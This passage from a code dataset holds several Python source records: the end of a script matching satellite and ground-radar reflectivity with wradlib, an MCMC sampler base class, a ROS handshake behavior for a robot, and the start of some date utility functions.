wradlib.zonalstats.GridPointsToPoly(zd)\n\n# Get source indices within GR-Domain from zonal object\n# (0 because we have only one zone)\n## alok modified (14/1/2019) pr_idx = obj1.zdata.get_source_index(0) \n\n# Subsetting in order to use only precipitating profiles\n## alok modified (14/1/2019) src_idx = np.zeros_like(pflag, 
dtype=np.bool)\n## alok modified (14/1/2019) mask = np.unravel_index(pr_idx, pflag.shape)\n## alok modified (14/1/2019) src_idx[mask] = True\n\n# get precip indexes\n## alok modified (14/1/2019) precip_mask = (pflag == 2)\n## alok modified (14/1/2019) precip_idx = src_idx & precip_mask\nprecip_mask = (pflag == 2) & wrl.zonalstats.get_clip_mask(pr_xy, gr_domain, rad)\n## pl.imshow(precip_mask)\n# get iscan/iray boolean arrays\n## alok modified (14/1/2019) iscan = precip_idx.nonzero()[0]\n## alok modified (14/1/2019) iray = precip_idx.nonzero()[1]\niscan = precip_mask.nonzero()[0]\niray = precip_mask.nonzero()[1]\n\nprint(\"NRAY\", nray_pr)\nprint(\"NBIN\", ngate_pr)\n\n# Approximation!\nalpha = abs(-17.04 + np.arange(nray_pr) * bw_pr)\n\n# Correct for parallax, get 3D-XYZ-Array\n# xyzp_pr: Parallax corrected xyz coordinates\n# r_pr_inv: range array from ground to PR platform\n# zp: PR bin altitudes\nxyzp_pr, r_pr_inv, z_pr = correct_parallax(pr_xy, nray_pr, ngate_pr, dr_pr, alpha)\n\nprint(\"PR_XYP:\", xyzp_pr.shape, z_pr.shape)\n#parallax corrected pr values(alok modified)\n# TODO: Do we have to consider refraction in sat2pol?\nr_pr, elev_pr, az_pr = sat2pol(xyzp_pr, (lon0_gr, lat0_gr, alt0_gr), re1)#done \nmask = (elev_pr > (1.0 - bw_gr/2.)) & (elev_pr < (1.0 + bw_gr/2.))#done\n##pl.figure()\n##pl.pcolormesh(mask[90,:,:].T)\n\n# PR pulse volumes\n\n# Range of PR bins\ndists = dist_from_orbit(zt, alpha, r_pr_inv)#done\n\n## Original IDL code...\n## rt=zt/COS(!dtor*alpha)-range\n## volp=(1.e-9)*!pi*(rt*!dtor*bwt/2.)^2*drt\n## Translated to Python\nvol_pr2 = np.pi * dr_pr * (dists * np.radians(bw_pr / 2.))**2\n##fig = pl.figure(figsize=(12,4))\n##pm = pl.pcolor(vol_pr.T)\n##pl.colorbar(pm)\n\n# Or using wradlib's native function\nvol_pr = wradlib.qual.pulse_volume(dists, dr_pr, bw_pr)\n#vol_pr = np.pi * dr_pr * (dists ** 2) * (np.tan(np.radians(bw_pr/2.))) ** 2\n\n# Evaluate difference between both approaches\nprint(\"Min. difference (m3):\", (vol_pr - vol_pr2).min())\nprint(\"Max. difference (m3): \", (vol_pr - vol_pr2).max())\nprint(\"Average rel. 
difference (%):\", round(np.mean(vol_pr-vol_pr2)*100./np.mean(np.mean(vol_pr2)), 4))\n\n# Verdict: differences are negligble - use wradlibs's native function!\n\n# GR pulse volumes\n# along one beam\nvol_gr = wradlib.qual.pulse_volume(r_gr, dr_gr, bw_gr)#done\n# with shape (nray_gr, ngate_gr)\nvol_gr = np.repeat(vol_gr, nray_gr).reshape((nray_gr,ngate_gr), order=\"F\")#done\n\nratio, zbb, median_bb_height, bb_width = get_bb_ratio(pr_data, z_pr) #bright band height and ratio\n##pl.pcolormesh(ratio[60,:,:].T, vmin=-1, vmax=2)\n##pl.colorbar()\n\n# REVERSE!!!\nrefp = pr_data['refl'][:,:,::-1]\nprint(\"REFP:\", refp.shape)\n\nrefp_ss = np.zeros_like(refp) * np.nan\nrefp_sh = np.zeros_like(refp) * np.nan\n\na_s, a_h = s_ku_coefficients()\n\nia = (ratio >= 1)\nrefp_ss[ia] = refp[ia] + calculate_polynomial(refp[ia], a_s[:,10])\nrefp_sh[ia] = refp[ia] + calculate_polynomial(refp[ia], a_h[:,10])\nib = (ratio <= 0)\nrefp_ss[ib] = refp[ib] + calculate_polynomial(refp[ib], a_s[:,0])\nrefp_sh[ib] = refp[ib] + calculate_polynomial(refp[ib], a_h[:,0])\nim = (ratio > 0) & (ratio < 1)\nind = np.round(ratio[im] * 10).astype(np.int)\n#print(\"W:\", a_s[:,ind].shape)\nrefp_ss[im] = refp[im] + calculate_polynomial(refp[im], a_s[:,ind])\nrefp_sh[im] = refp[im] + calculate_polynomial(refp[im], a_h[:,ind])\n\nrefp_ss[refp < 0] = np.nan\nout = np.ma.masked_invalid(refp_ss)\n##pl.figure()\n##pl.pcolormesh(out[60,:,:].T, vmin=0, vmax=60)\n##pl.colorbar()\n##pl.figure()\n##pl.pcolormesh(refp[60,:,:].T, vmin=0, vmax=60)\n##pl.colorbar()\n##pl.figure()\n##pl.pcolormesh(ratio[60,:,:].T, vmin=-1, vmax=2)\n##pl.colorbar()\n\n# Convert S-band GR reflectivities to Ku-band using method of Liao and Meneghini (2009)\nref_gr_ku = np.zeros_like(ref_gr) * np.nan\n\n# Which zbb value should we take here???\n# Q'n'Dirty: just take the mean of all PR profiles\n# TODO: Consider zbb for each profile during the matching process\n\n# Snow\nia = ( gr_xyz[...,2] >= np.nanmean(zbb) )\nref_gr_ku[ia] = ku2s[\"snow\"][0] + ku2s[\"snow\"][1]*ref_gr[ia] + ku2s[\"snow\"][2]*ref_gr[ia]**2\n\n# Rain\nib = ( gr_xyz[...,2] < np.nanmean(zbb) )\nref_gr_ku[ib] = ku2s[\"rain\"][0] + ku2s[\"rain\"][1]*ref_gr[ib] + ku2s[\"rain\"][2]*ref_gr[ib]**2\n\n# Jackson Tan's fix for C-band\nis_cband = True\nif (is_cband):\n delta = (ref_gr_ku - ref_gr) * 5.3/10.0\n ref_gr_ku = ref_gr + delta\n\n# First assumption: no valid PR bins (all False)\nvalid = np.asarray(elev_pr, dtype=np.bool)==False\n# PR is inside GR range and is precipitating\nvalid[iscan,iray] = True\n# PR bins intersect with GR sweep\nvalid = valid & (elev_pr >= elev-bw_gr/2.) 
& (elev_pr <= elev+bw_gr/2.)\n# Number of matching PR bins per profile\nnvalids = np.sum(valid, axis=2)\n# scan and ray indices for profiles with at least one valid bin\nvscan, vray = np.where(nvalids>0)\n# number of profiles with at least one valid bin\nnprof = len(vscan)\n# Lots of containers to store samples (only for one GR sweep angle!)\nx = np.zeros(nprof)*np.nan # x coordinate of sample\ny = np.zeros(nprof)*np.nan # y coordinate of sample\nz = np.zeros(nprof)*np.nan # z coordinate of sample\nprecip_type = np.zeros(nprof,dtype=\"i4\")*np.nan #precipitation type\nthreshold_percentage_GR = np.zeros(nprof)*np.nan #threshold percentage for GR\nthreshold_percentage_PR = np.zeros(nprof)*np.nan #threshold percentage for PR\ndz = np.zeros(nprof)*np.nan # depth of sample\nds = np.zeros(nprof)*np.nan # width of sample\nrs = np.zeros(nprof)*np.nan # range of sample from GR\nrefpr1 = np.zeros(nprof)*np.nan # PR reflectivity\nrefpr2 = np.zeros(nprof)*np.nan # PR reflectivity (S-band, snow)\nrefpr3 = np.zeros(nprof)*np.nan # PR reflectivity (S-band, hail) \nrefgr1 = np.zeros(nprof)*np.nan # GR reflectivity\nrefgr2 = np.zeros(nprof)*np.nan # GR reflectivity (Ku-band)\nntotpr = np.zeros(nprof,dtype=\"i4\")# total number of PR bins in sample\nnrej1 = np.zeros(nprof,dtype=\"i4\")# number of rejected PR bins in sample\nntotgr = np.zeros(nprof,dtype=\"i4\")# total number of GR bins in sample\nnrej2 = np.zeros(nprof,dtype=\"i4\")# number of rejected GR bins in sample\niref1 = np.zeros(nprof)*np.nan # path-integrated PR reflectivity\niref2 = np.zeros(nprof)*np.nan # path-integrated GR reflectivity\nstdv1 = np.zeros(nprof)*np.nan # std. dev. of PR reflectivity in sample\nstdv2 = np.zeros(nprof)*np.nan # std. dev. of GR reflectivity in sample\nvolpr = np.zeros(nprof)*np.nan # total volume of PR bins in sample\nvolgr = np.zeros(nprof)*np.nan # total volume of GR bins in sample\n# Loop over relevant PR profiles\nX_axis=\"X_axis\"\nY_axis=\"Y_axis\"\nZ_axis=\"Z_axis\"\nGR_refl_bins=\"GR_bin\"\nPR_refl=\"PR_Ref\"\nsweep= ee\nalok_file_refl_text_file='binned_reflectivity_'+ str(sweep) +'_.txt'\nalok_file_refl_2='matched_reflectivity_data_sweep_'+ str(sweep) +'_.txt'\nf = open(alok_file_refl_text_file, 'wb')\nf.write(\"%-15s %-15s %-15s %-15s %-15s\\n\"%(X_axis, Y_axis, Z_axis, GR_refl_bins, PR_refl))\nfor ii, (ss, rr) in enumerate(zip(vscan,vray)):\n # Index and count valid bins in each profile\n ip = np.where(valid[ss,rr])[0]#important#done\n numbins = len(ip)\n ntotpr[ii]=numbins\n if numbins == 0:\n continue\n # Compute the mean position of these bins\n x[ii]=np.mean(xyzp_pr[ss,rr,ip,0])#done\n y[ii]=np.mean(xyzp_pr[ss,rr,ip,1])#done\n z[ii]=np.mean(xyzp_pr[ss,rr,ip,2])#done\n precip_type[ii]=precipitation_type[ss,rr] #done #save it in matfiles\t\n # Thickness of the layer\n dz[ii]=(numbins * dr_pr) * np.cos( np.radians(alpha[rr]) )#done\n\n # PR averaging volume\n volpr[ii]=np.sum(vol_pr2[rr,ip])#done\n\n # Note mean TRMM beam diameter\n ds[ii]=np.radians(bw_pr) * np.mean( ( (zt-z[ii]) / np.cos( np.radians(alpha[rr]) ) ) )#check in spyder\n\n # Note distance from radar\n s=np.sqrt(x[ii]**2+y[ii]**2)#done\n rs[ii]=(re2+z[ii]) * np.sin(s/re2) / np.cos(np.radians(elev))#done\n \n # This should not be required because we applied ZonalData\n ### Check that sample is within radar range\n ##if r[ii,jj]+ds[ii,jj]/2. 
gt rmax then continue\n\n ## THIS IS THE ORIGINAL IDL CODE - IS THIS A BUG???\n ##ref1[ii,jj]=MEAN(refp1,/nan)\n ##ref3[ii,jj]=MEAN(refp2,/nan)\n ##ref4[ii,jj]=MEAN(refp3,/nan)\n \n # Simple linear average of reflectivity \n # - we can become fancier in the next step\n # ATTENTION: NEED TO FLIP ARRAY\n PR_reflectivity_bins_considered_for_matching=np.shape(np.flipud(refp) [ss,rr,ip])\n PR_reflectivity_bins_considered_for_matching=float(PR_reflectivity_bins_considered_for_matching[0])\n PR_reflectivity_bins_considered_which_are_above_threshold_value=np.shape(np.where((np.flipud(refp) [ss,rr,ip])>18.0))\n PR_reflectivity_bins_considered_which_are_above_threshold_value=float(PR_reflectivity_bins_considered_which_are_above_threshold_value[1])\n PR_Threshold_percentage=(PR_reflectivity_bins_considered_which_are_above_threshold_value/PR_reflectivity_bins_considered_for_matching)*100\n threshold_percentage_PR[ii] = PR_Threshold_percentage\n #####\n refpr1[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp)[ss,rr,ip]/10))) #donot forget to flip #done #mean of the reflectivity taken here #important\n refpr2[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp_ss)[ss,rr,ip]/10)))\n refpr3[ii]=10*np.log10(np.nanmean(10**(np.flipud(refp_sh)[ss,rr,ip]/10)))\n \n ## Not sure why we need this...\n ### Note the number of rejected bins\n ##nrej1[ii,jj]=ROUND(TOTAL(FINITE(refp1,/nan)))\n ##if FINITE(stdv1[ii,jj]) eq 0 and np-nrej1[ii,jj] gt 1 then STOP\n\n # SHOULD WE USE ZONALDATA INSTEAD? COULD BE MORE ACCURATE, BUT ALSO SLOWER\n # WE COULD BASICALLY START A NEW LOOP HERE AND RUN ZONALDATA BEFORE\n \n # Compute the horizontal distance to all the GR bins\n d = np.sqrt((gr_xyz[...,0]-x[ii])**2 + (gr_xyz[...,1]-y[ii])**2)\n\n # Find all GR bins within the SR beam\n aa, bb = np.where(d <= ds[ii]/2.)\n\n # Store the number of bins\n ntotgr[ii] = len(aa)\n\n if len(aa) == 0:\n continue\n\n # Extract the relevant GR bins\n\n # Compute the GR averaging volume\n volgr[ii]=np.sum(vol_gr[aa,bb])\n\n # Average over those bins that exceed the reflectivity threshold \n # IDL code does exponential distance and volume weighting\n # Let's try simple mean first,\n # THEN ZonalStats!\n\n #print('GR refl shape:',np.shape(ref_gr[aa,bb]))\n GR_reflectivity_bins_considered_for_matching=np.shape(ref_gr[aa,bb])\n GR_reflectivity_bins_considered_for_matching=float(GR_reflectivity_bins_considered_for_matching[0])\n GR_reflectivity_bins_considered_which_are_above_threshold_value=np.shape(np.where(ref_gr[aa,bb].data>=0.0))\n GR_reflectivity_bins_considered_which_are_above_threshold_value=float(GR_reflectivity_bins_considered_which_are_above_threshold_value[1])\n GR_Threshold_percentage=(GR_reflectivity_bins_considered_which_are_above_threshold_value/GR_reflectivity_bins_considered_for_matching)*100\n threshold_percentage_GR[ii] = GR_Threshold_percentage\n #print('GR threshold percentage:',GR_Threshold_percentage)\n ####\n refgr1[ii]=10*np.log10(np.nanmean(10**(ref_gr[aa,bb]/10)))\n refgr2[ii]=10*np.log10(np.nanmean(10**(ref_gr_ku[aa,bb]/10)))\n GR_1=np.zeros(numbins)\n GR_2=np.zeros(numbins)\n if (np.sum(np.isnan(np.flipud(refp)[ss,rr,ip]))>0):\n GR_1[:]=np.nan\n GR_2[:]=np.nan\n elif (np.sum(np.abs(np.flipud(refp)[ss,rr,ip]))==0):\n GR_1[:]=refgr1[ii]/numbins\n GR_2[:]=refgr2[ii]/numbins\n elif (np.sum(np.abs(np.flipud(refp)[ss,rr,ip]))>0):\n for metrs in range(numbins):\n GR_1[metrs]=10*np.log10(10**(refgr1[ii]/10)*(10**(np.flipud(refp)[ss,rr,ip[metrs]]/10))/(np.sum(10**(np.flipud(refp)[ss,rr,ip]/10))))\n 
GR_2[metrs]=10*np.log10(10**(refgr2[ii]/10)*(10**(np.flipud(refp)[ss,rr,ip[metrs]]/10))/(np.sum(10**(np.flipud(refp)[ss,rr,ip]/10))))\n for m in range(numbins):\n k=ip[m]\n #print('x:',xyzp_pr[ss,rr,ip[m],0],'y:',xyzp_pr[ss,rr,ip[m],1],'z:',xyzp_pr[ss,rr,ip[m],2],'gr refl:',refgr2[ii],'refl pr:',np.flipud(refp)[ss,rr,ip[m]])\n #print(\"%-15f %-15f %-15f %-15f %-15f\"%(xyzp_pr[ss,rr,ip[m],0], xyzp_pr[ss,rr,ip[m],1], xyzp_pr[ss,rr,ip[m],2], refgr2[ii], np.flipud(refp)[ss,rr,ip[m]]))\n f.write(\"%-15f %-15f %-15f %-15f %-15f\\n\"%(x[ii], y[ii], xyzp_pr[ss,rr,ip[m],2], GR_2[m], np.flipud(refp)[ss,rr,ip[m]]))\n \t#print(\"beam diameter:\",ds[ii])\nf.close() \nfig = pl.figure(figsize=(12,5))\nax = fig.add_subplot(121, aspect=\"equal\")\npl.scatter(refgr1, refpr1, marker=\"+\", c=\"black\")\npl.plot([0,60],[0,60], linestyle=\"solid\", color=\"black\")\npl.xlim(10,50)\npl.ylim(10,50)\npl.xlabel(\"GR reflectivity (dBZ)\")\npl.ylabel(\"PR reflectivity (dBZ)\")\nax = fig.add_subplot(122)\npl.hist(refgr1[refpr1>-10], bins=np.arange(-10,50,5), edgecolor=\"None\", label=\"GR\")\npl.hist(refpr1[refpr1>-10], bins=np.arange(-10,50,5), edgecolor=\"red\", facecolor=\"None\", label=\"PR\")\npl.xlabel(\"Reflectivity (dBZ)\")\npl.legend()\nfig = pl.figure(figsize=(12,12))\nax = fig.add_subplot(121, aspect=\"equal\")\npl.scatter(x, y, c=refpr1, cmap=pl.cm.jet, vmin=0, vmax=50, edgecolor=\"None\")\npl.title(\"PR reflectivity\")\npl.grid()\nax = fig.add_subplot(122, aspect=\"equal\")\npl.scatter(x, y, c=refgr1, cmap=pl.cm.jet, vmin=0, vmax=50, edgecolor=\"None\")\npl.title(\"GR reflectivity\")\npl.grid()\nmat_file_data={}\nmat_file_data.update({'x': x, 'y': y, 'z': z, 'refl_pr': refpr1,\n 'ref_gr': refgr1,'ref_gr_ku':refgr2, 'precipitation_type':precip_type, \n\t\t 'Threshold_Percentage_GR':threshold_percentage_GR,\n\t\t 'Threshold_Percentage_PR':threshold_percentage_PR#'All_PR_coords_axis':xyzp_pr,\n\t\t #'Average_BB_Height':median_bb_height, 'Average_BB_Width':bb_width,\n\t\t #'Overpass_time_diff':abs(time_diff_for_orbit)\n\t\t })\n#sio.savemat(alok_file_coord, {'x':np.x},{'y':np.y})\nsio.savemat(alok_file_refl_2, mat_file_data)\n","repo_name":"alok-iit-108/binned-volume-matching","sub_path":"alignment_CAGE_demo.py","file_name":"alignment_CAGE_demo.py","file_ext":"py","file_size_in_byte":27454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42468166502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nA base sampler class.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function, \n unicode_literals)\n\nimport numpy as np\n\nclass Sampler(object):\n \"\"\"\n An abstract sampler object that implements basic helper functions\n required in most MCMC samplers.\n\n Parameters\n ----------\n\n dim : int\n The number of dimensions in the parameter space. \n lnprobfn : function\n A function that takes a vector in the parameter space as input and \n returns the natural logarithm of the probability at that position. \n args : list (optional)\n Positional arguments for ``lnprobfn``. ``lnprobfn`` will be called \n as ``lnprobfn(p, *args, **kwargs)``. \n kwargs : dict (optional)\n Keyword arguments for ``lnprobfn``. 
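Throughout the matching loop above, reflectivities are averaged in linear units and only then converted back to dBZ (the 10*np.log10(np.nanmean(10**(z/10))) pattern). A short standalone check of why this matters — the linear-domain mean is dominated by the strongest echoes, so it differs from a naive average of the dB values:

import numpy as np

def dbz_mean(dbz):
    # Convert dBZ -> linear reflectivity, average, convert back to dBZ.
    z_lin = 10 ** (np.asarray(dbz, dtype=float) / 10)
    return 10 * np.log10(np.nanmean(z_lin))

z = [20.0, 40.0]
print(np.mean(z))   # 30.0  (plain average of the dB values)
print(dbz_mean(z))  # ~37.0 (linear-domain average, as used by the script)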
``lnprobfn`` will be called as \n        ``lnprobfn(p, *args, **kwargs)``.\n    \"\"\"\n    def __init__(self, dim, lnprobfn, args=[], kwargs={}):\n        self.dim = dim\n        self.lnprobfn = lnprobfn\n        self.args = args\n        self.kwargs = kwargs\n\n        # Starting the random number generator\n        self._random = np.random.mtrand.RandomState()\n\n        self.reset()\n    \n    def reset(self):\n        \"\"\"\n        Clear the ``chain``, ``lnprobability`` and reset the book-keeping\n        parameters.\n        \"\"\"\n        self._chain = np.empty((0, self.dim))\n        self._lnprob = np.empty(0)\n        \n        self.iterations = 0\n        self.accepted = 0\n        self._last_run = None\n    \n    @property\n    def random_state(self):\n        \"\"\"The state of the internal random number generator.\"\"\"\n        return self._random.get_state()\n\n    @random_state.setter\n    def random_state(self, state):\n        \"\"\"\n        Tries to set the state of the random number generator. It fails \n        silently if it doesn't work.\n        \"\"\"\n        try:\n            self._random.set_state(state)\n        except:\n            pass\n\n    @property\n    def acceptance_fraction(self):\n        \"\"\"The fraction of the proposed steps that were accepted.\"\"\"\n        return self.accepted / self.iterations\n    \n    @property\n    def chain(self):\n        \"\"\"Pointer to the Markov chain.\"\"\"\n        return self._chain\n    \n    @property\n    def lnprobability(self):\n        \"\"\"\n        List of log-probability values associated with each step in the chain.\n        \"\"\"\n        return self._lnprob\n    \n    def get_lnprob(self, p):\n        \"\"\"The log-probability at the given position.\"\"\"\n        return self.lnprobfn(p, *self.args, **self.kwargs)\n    \n    def sample(self, *args, **kwargs):\n        raise NotImplementedError(\"The sampling routine must be implemented \"\n                                  \"by subclasses\")\n    \n    def run(self, p0, N, lnprob0=None, rstate0=None, **kwargs):\n        \"\"\"\n        Run ``sample`` for ``N`` iterations and return the result.\n\n        Parameters\n        ----------\n\n        p0 : list\n            The initial position vector.\n        N : int\n            Number of iterations to run ``sample``. \n        lnprob0 : list (optional)\n            The log-probability at position ``p0``.\n        rstate0 : list (optional)\n            The state of the random number generator. \n        kwargs : dict (optional)\n            Other parameters that are provided directly to ``sample``.\n\n        Returns\n        -------\n\n        results : tuple\n            The final position vector, log-probability and state of the\n            random number generator.\n        \n        Notes\n        -----\n\n        If ``p0`` is not provided, it will take the value from the last run.\n        This will also be done for ``lnprob0`` and ``rstate0``.\n        \"\"\"\n        if p0 is None:\n            if self._last_run is None:\n                raise ValueError(\"Cannot have p0=None if run has never \"\n                                 \"been called.\")\n            p0 = self._last_run[0]\n            if lnprob0 is None:\n                lnprob0 = self._last_run[1]\n            if rstate0 is None:\n                rstate0 = self._last_run[2]\n        \n        for results in self.sample(p0, lnprob0, rstate0, iterations=N, \n                                   **kwargs):\n            pass\n        \n        # Store for ``p0=None`` case\n        self._last_run = results[:3]\n\n        return results\n","repo_name":"fgittins/montepython","sub_path":"montepython/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"724162833","text":"#! /usr/bin/env python\n# License: Apache 2.0. See LICENSE file in root directory.\n#\n# For simple behaviors that can run synchronously, Python provides\n# a simple way to implement this. 
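The Sampler.sample method in the record above is deliberately left to subclasses. A minimal, hypothetical Metropolis-style implementation of that contract — the class name and proposal scale are illustrative, and it assumes the Sampler base class above is in scope:

import numpy as np

class MetropolisSampler(Sampler):
    def sample(self, p0, lnprob0=None, rstate0=None, iterations=1, scale=0.1):
        self.random_state = rstate0  # setter fails silently on None
        p = np.array(p0, dtype=float)
        lnprob = self.get_lnprob(p) if lnprob0 is None else lnprob0
        for _ in range(iterations):
            q = p + scale * self._random.randn(self.dim)  # Gaussian proposal
            lnprob_q = self.get_lnprob(q)
            # Accept with probability min(1, exp(lnprob_q - lnprob)).
            if np.log(self._random.rand()) < lnprob_q - lnprob:
                p, lnprob = q, lnprob_q
                self.accepted += 1
            self.iterations += 1
            self._chain = np.vstack((self._chain, p))
            self._lnprob = np.append(self._lnprob, lnprob)
            yield p, lnprob, self.random_state

With this in place, MetropolisSampler(2, lambda p: -0.5 * np.sum(p**2)).run(np.zeros(2), 1000) draws from a 2-D standard normal, and acceptance_fraction then reports the accept rate the base class tracks.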
Add the work of your behavior\n# in the execute_cb callback\n#\n\nimport rospy\nimport actionlib\nimport behavior_common.msg\n\nimport time\nimport random\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import UInt16\nfrom std_msgs.msg import Bool\nfrom std_msgs.msg import Empty\n\n# for talking\nimport actionlib\nimport actionlib.action_client\nimport audio_and_speech_common.msg\n\n# for servos\n#from sheldon_servos.head_servo_publishers import *\n#from sheldon_servos.right_arm_servo_publishers import *\n#from sheldon_servos.left_arm_servo_publishers import *\n\nfrom sheldon_servos.standard_servo_positions import *\nfrom sheldon_servos.set_servo_speed import *\nfrom sheldon_servos.set_servo_torque import *\n\n# Globals\n\ndef move_arm_shake_preliminary():\n pub_right_arm_shoulder_rotate.publish(0.9)\n pub_right_arm_shoulder_lift.publish(0.05)\n head_home() \n pub_head_pan.publish(-0.20)\n\ndef move_arm_shake_ready():\n pub_right_arm_shoulder_rotate.publish(0.9) #1.12\n pub_right_arm_shoulder_lift.publish(0.05)\n pub_right_arm_elbow_rotate.publish(-0.47)\n pub_right_arm_elbow_bend.publish(1.37)\n pub_right_arm_wrist_rotate.publish(-1.35)\n pub_right_arm_gripper_finger.publish(0.0)\n\ndef move_arm_shake_up():\n pub_right_arm_elbow_bend.publish(1.47)\n #head_home() \n\ndef move_arm_shake_down():\n pub_right_arm_elbow_bend.publish(1.09)\n #head_home() \n\n\n\nclass BehaviorAction(object):\n _feedback = behavior_common.msg.behaviorFeedback()\n _result = behavior_common.msg.behaviorResult()\n\n def __init__(self, name):\n self._action_name = name\n self._as = actionlib.SimpleActionServer(self._action_name, behavior_common.msg.behaviorAction, execute_cb=self.execute_cb, auto_start = False)\n self._as.start()\n\n rospy.loginfo('%s: Initializing Shake Hands behavior service' % (self._action_name))\n\n # enable/disable microphone when robot is moving servos. \n # (Note system_enable vs. speech_enable vs. user_enable)\n self.mic_system_enable_pub = rospy.Publisher('/microphone/system_enable', Bool, queue_size=1) \n\n sensor_sub = rospy.Subscriber('/arm_hand_sensor_right', UInt16, self.sensor_cb) # hand sensor messages\n\n rospy.loginfo('%s: Initialized behavior service' % (self._action_name))\n\n\n def sensor_cb(self, msg):\n # rospy.loginfo(\"%s: sensor_cb called\", self._action_name)\n nearest_object_to_hand = msg.data\n if nearest_object_to_hand < 100: # mm\n #rospy.loginfo(\"%s: sensor_cb: Hand detected\", self._action_name)\n self.hand_detected = True\n else:\n self.hand_detected = False\n\n # ===========================================================================\n # Utility functions\n\n def InterruptRequested(self):\n # check if preempt has been requested by the client\n if self._as.is_preempt_requested():\n rospy.logwarn('=====> %s: BEHAVIOR PREEMPTED!' % self._action_name)\n self.cleanup(True)\n return True\n else:\n return False\n\n def cleanup(self, interrupted):\n # clean everyting up before exiting\n\n # Restore Servo defaults\n SetServoTorque(0.5, all_servo_joints)\n SetServoSpeed(0.5, all_servo_joints)\n\n # Move arms to ready position. 
Leave head looking at user until idle head tracking kicks in\n right_arm_home()\n left_arm_home()\n\n # allow time for servos to complete moving\n time.sleep(2) \n\n # un-mute the microphone\n self.mic_system_enable_pub.publish(True)\n\n if interrupted:\n rospy.loginfo('%s: Behavior preempted' % self._action_name)\n self._as.set_preempted()\n else:\n rospy.loginfo('%s: Behavior complete' % self._action_name)\n self._as.set_succeeded(self._result)\n\n\n #====================================================================\n # Execute Behavior\n def execute_cb(self, goal):\n rospy.loginfo('%s: Executing behavior' % (self._action_name))\n rospy.loginfo( \"Param1: '%s'\", goal.param1)\n rospy.loginfo( \"Param2: '%s'\", goal.param2)\n\n # ====== Behavior Implementation ====== \n success = True\n r = rospy.Rate(1.0)\n\n # initialization\n rospy.loginfo(\"Waiting for speech server (press ctrl-c to cancel at anytime)\")\n client = actionlib.SimpleActionClient(\"/speech_service\", audio_and_speech_common.msg.speechAction)\n client.wait_for_server()\n\n SetServoTorque(1.5, all_servo_joints) \n SetServoSpeed(0.8, all_servo_joints)\n SetSingleServoSpeed(1.5, 'right_arm_shoulder_rotate_joint')\n #SetSingleServoSpeed(1.5, 'left_arm_shoulder_rotate_joint')\n\n # mute the microphone\n self.mic_system_enable_pub.publish(False)\n \n # Move arm into shake position\n move_arm_shake_preliminary()\n time.sleep(1)\n move_arm_shake_ready()\n\n # say hello while arms are moving\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"hello\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n\n # wait for sensor reading, indicating person is holding hand\n for i in range (1,26): # note, about 6 seconds of this time the arm is still moving into position\n if self.InterruptRequested():\n return\n if self.hand_detected:\n rospy.loginfo(\"DBG: hand detected\")\n break\n time.sleep(0.5) \n\n if not self.hand_detected:\n # no person detected\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"well, this is awkward\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n self.cleanup(False)\n return\n\n # say something nice\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"I am pleased to meet you\")\n client.send_goal(goal)\n # Don't wait for speech to complete, start shaking hands\n #result = client.wait_for_result() # wait for speech to complete\n #rospy.loginfo(\"Speech goal returned result: %d\", result)\n time.sleep(2)\n\n # Start shaking hands. 
\n for i in range(1, 5):\n\n move_arm_shake_up() # 1\n if self.InterruptRequested():\n return\n time.sleep(0.5)\n\n move_arm_shake_down()\n if self.InterruptRequested():\n return\n time.sleep(0.5)\n\n if not self.hand_detected:\n # no person detected, they must have let go\n rospy.loginfo(\"DBG: person let go early\")\n self.cleanup(False)\n return\n\n # done shaking hands, wait for user to let go\n for i in range (1,6):\n if self.InterruptRequested():\n return\n if not self.hand_detected: # user let go\n rospy.loginfo(\"DBG: person let go at appropriate time\")\n break\n time.sleep(0.5) \n\n if self.hand_detected:\n # person still holding hand\n rospy.loginfo(\"Talking\")\n goal = audio_and_speech_common.msg.speechGoal(text_to_speak=\"um, you can let go now\")\n client.send_goal(goal)\n result = client.wait_for_result() # wait for speech to complete\n rospy.loginfo(\"Speech goal returned result: %d\", result)\n \n\n # wait for user to let go\n for i in range (1,10):\n if self.InterruptRequested():\n return\n if not self.hand_detected:\n rospy.loginfo(\"DBG: person finally let go\")\n break\n time.sleep(0.5) \n\n\n # Behavior Done, clean up\n # Includes moving head and arms back to ready position\n self.cleanup(False)\n \n \nif __name__ == '__main__':\n rospy.init_node('shake_hands_behavior')\n server = BehaviorAction(rospy.get_name())\n rospy.spin()\n","repo_name":"shinselrobots/sheldon","sub_path":"sheldon_behaviors/shake_hands_behavior/scripts/behavior_service.py","file_name":"behavior_service.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40494185319","text":"# -*- coding:utf-8 -*-\nimport calendar\nfrom datetime import date, datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom six import string_types\n__author__ = 'denishuang'\n\n\ndef format_the_date(the_date=None):\n if not the_date:\n return date.today()\n if isinstance(the_date, string_types):\n return datetime.strptime(the_date[:10], \"%Y-%m-%d\").date()\n if isinstance(the_date, datetime):\n return the_date.date()\n return the_date\n\n\ndef get_date_by_day(day, today=None):\n today = format_the_date(today)\n endday = calendar.monthrange(today.year, today.month)[1]\n if day > endday:\n day = endday\n return date(today.year, today.month, day)\n\n\ndef get_next_date(the_date=None, days=1):\n the_date = format_the_date(the_date)\n return the_date + timedelta(days=days)\n\ndef date_range(begin_date, end_date):\n d = format_the_date(begin_date)\n end_date = format_the_date(end_date)\n if end_date<d:\n return\n while end_date>= d:\n yield d\n d = d+timedelta(days=1)\n\ndef get_this_and_next_monday(the_date=None):\n 